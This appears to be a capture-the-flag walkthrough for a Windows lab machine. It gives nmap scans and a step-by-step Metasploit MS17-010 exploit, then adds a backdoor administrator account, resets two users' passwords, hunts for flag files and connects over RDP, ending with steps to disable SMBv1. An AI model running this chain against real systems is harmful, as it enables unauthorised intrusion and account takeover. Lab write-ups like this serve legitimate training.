# basic port scan
sudo nmap -sS <target-ip>
# script scan port 80
sudo nmap -sV -sC -p 80 <target-ip>
# vulnerability port scan
sudo nmap -sV -p 445 --script smb-vuln* <target-ip>
User named scarra's password found on HTTP enumeration and server is running SMBv1 and is vulnerable to MS17-010.
# metasploit attack to establish foothold
sudo msfconsole -q
search ms17-010
use exploit/windows/smb/ms17_010_psexec
set RHOST <target-ip>
set LHOST <attack-ip>
exploit
# create an administrator user
shell
net user <username> <password> /add
net localgroup administrators <username> /add
# change password of poki and scarra
net user poki <password>
net user scarra <password>
# find all flags
cd C:\
dir flag*.txt /s
# access machine with xfreerdp
xfreerdp /u:<username> /p:<password> /v:<target-ip> /size:90%
# run powershell as administrator and disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol
From the Microsoft documentation on disabling SMB on Windows servers:
- On the Server Manager Dashboard of the server where you want to remove SMBv1, under Configure this local server, select Add roles and features.
- On the Before you begin page, select Start the Remove Roles and Features Wizard, and then on the following page, select Next.
- On the Select destination server page under Server Pool, ensure that the server you want to remove the feature from is selected, and then select Next.
- On the Remove server roles page, select Next.
- On the Remove features page, clear the check box for SMB 1.0/CIFS File Sharing Support and select Next.
- On the Confirm removal selections page, confirm that the feature is listed, and then select Remove.